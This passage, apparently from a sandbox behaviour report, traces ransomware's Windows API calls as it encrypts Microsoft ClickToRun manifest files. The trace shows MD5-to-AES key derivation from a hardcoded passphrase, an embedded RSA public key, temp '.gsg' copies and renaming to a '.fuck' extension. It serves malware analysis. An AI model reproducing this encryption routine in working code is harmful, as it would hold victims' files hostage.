GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.050] GetLastError () returned 0x5 [0236.050] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml")) returned 0x20 [0236.051] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0236.051] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.051] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.052] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.052] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27ff650) returned 1 [0236.061] CryptCreateHash (in: hProv=0x27ff650, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.061] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.061] CryptHashData (hHash=0x27eb8a0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.062] CryptDeriveKey (in: hProv=0x27ff650, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.062] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.062] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.062] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27febb0) returned 1 [0236.064] CryptImportPublicKeyInfo (in: hCryptProv=0x27febb0, dwCertEncodingType=0x1, pInfo=0x27f6878*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f68a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f68b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb2e0) returned 1 [0236.064] CryptEncrypt (in: hKey=0x27eb2e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.064] CryptEncrypt (in: hKey=0x27eb2e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fedd0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27fedd0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.065] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fedd0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.065] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2802860, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.065] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.065] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.065] CloseHandle (hObject=0xffffffff) returned 1 [0236.065] CloseHandle (hObject=0xffffffff) returned 1 [0236.065] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.065] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.066] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml.gsg")) returned 0 [0236.066] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml.fuck")) returned 0 [0236.066] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.066] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.066] CryptReleaseContext (hProv=0x27ff650, dwFlags=0x0) returned 1 [0236.066] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.066] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.066] GetLastError () returned 0x5 [0236.066] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml")) returned 0x20 [0236.067] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.067] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.067] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.067] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.068] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27ff540) returned 1 [0236.077] CryptCreateHash (in: hProv=0x27ff540, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.077] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.077] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.077] CryptDeriveKey (in: hProv=0x27ff540, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.077] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.077] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.078] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ff3a8) returned 1 [0236.080] CryptImportPublicKeyInfo (in: hCryptProv=0x27ff3a8, dwCertEncodingType=0x1, pInfo=0x27f6058*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6088*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6090*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb5a0) returned 1 [0236.080] CryptEncrypt (in: hKey=0x27eb5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.080] CryptEncrypt (in: hKey=0x27eb5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ff5c8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ff5c8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.080] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27ff5c8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.081] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2802860, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.081] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.081] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.081] CloseHandle (hObject=0xffffffff) returned 1 [0236.081] CloseHandle (hObject=0xffffffff) returned 1 [0236.081] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.081] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.082] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml.gsg")) returned 0 [0236.082] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml.fuck")) returned 0 [0236.082] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.082] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.082] CryptReleaseContext (hProv=0x27ff540, dwFlags=0x0) returned 1 [0236.082] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.082] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.082] GetLastError () returned 0x5 [0236.082] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml")) returned 0x20 [0236.083] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0236.084] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.084] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.084] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.084] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27fea18) returned 1 [0236.094] CryptCreateHash (in: hProv=0x27fea18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.094] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.094] CryptHashData (hHash=0x27eb8a0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.094] CryptDeriveKey (in: hProv=0x27fea18, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.094] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.094] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.094] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27feaa0) returned 1 [0236.098] CryptImportPublicKeyInfo (in: hCryptProv=0x27feaa0, dwCertEncodingType=0x1, pInfo=0x27f7308*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7338*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7340*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb6a0) returned 1 [0236.098] CryptEncrypt (in: hKey=0x27eb6a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.098] CryptEncrypt (in: hKey=0x27eb6a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fee58*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27fee58*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.098] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fee58, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.098] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2804868, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2804868, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.098] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804868*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2804868*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.098] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2804868, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.098] CloseHandle (hObject=0xffffffff) returned 1 [0236.098] CloseHandle (hObject=0xffffffff) returned 1 [0236.098] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.099] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.099] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml.gsg")) returned 0 [0236.100] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml.fuck")) returned 0 [0236.100] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.100] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.100] CryptReleaseContext (hProv=0x27fea18, dwFlags=0x0) returned 1 [0236.100] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.100] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.100] GetLastError () returned 0x5 [0236.100] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml")) returned 0x20 [0236.101] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.101] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.101] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, 